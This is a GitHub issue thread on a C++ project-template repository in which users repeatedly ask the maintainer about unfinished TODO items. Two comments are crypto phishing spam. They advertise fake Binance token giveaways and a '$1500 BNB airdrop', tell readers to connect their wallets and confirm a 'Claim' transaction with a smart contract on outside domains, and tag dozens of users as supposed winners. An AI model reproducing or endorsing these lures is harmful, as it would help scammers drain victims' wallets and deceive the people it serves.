### ISSUE TITLE
DON'T GIVE UP

### ISSUE THREAD

**Issue by makaspacex** [yicm/CMakeCppProjectTemplate#1]
This is a very nice repo which can make programer start a C++ project quickly. However, some important functions, just as your TODO list, is still in development. It's so worry about the progress of the todo task. Is it sill in development?

**Comment by yicm** [comment]
I didn't give up on it. It will be finished one day. I will try to finish it next year. 😄

**Comment by RobotFly** [comment]
DON'T GIVE UP yicm , good work

**Comment by 89trillion-feiyang** [comment]
> I didn't give up on it. It will be finished one day. I will try to finish it next year. 😄

2022 now.

**Comment by RavenNil** [comment]
2022 7.20 now. lol

**Comment by makaspacex** [comment]
2023 now

**Comment by yicm** [comment]
> 

This year is certain😂

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by makaspacex** [comment]
2024 now

**Comment by highpolar-shubham** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @Lilhamson, @zhoujs93, @evosaenyu, @li195111, @miaografa, @zhangs-lab, @qllibo, @mdvignjevic, @elanchou, @PatrickMei, @curiouscod3, @WhaleFell, @kingyueyang, @franklu00313, @dchien234, @CrabGeek, @Ulisses1478, @due3, @YiJhu, @luis069, @EmmerichAA, @Gor32, @metabsorber, @thexdesk, @0xshandy, @bpujol, @soulZhaoL, @0x00214131812049, @dpvro, @tianjyan, @Glebza, @yeefea, @QGB, @taomu, @SantosPereira, @Avinash-Raj, @phughes23, @NickBoor, @hubyuan, @Amer7G7, @compasty, @jhonnybegood, @dorukgezici, @dhkiway, @slakynbe, @hcaihao, @CodexLink, @aidenV3, @fransimo, @diopisemou

**Comment by QGB** [comment]
urls=[f'https://{ip}:9443/ws' for ip in ips]
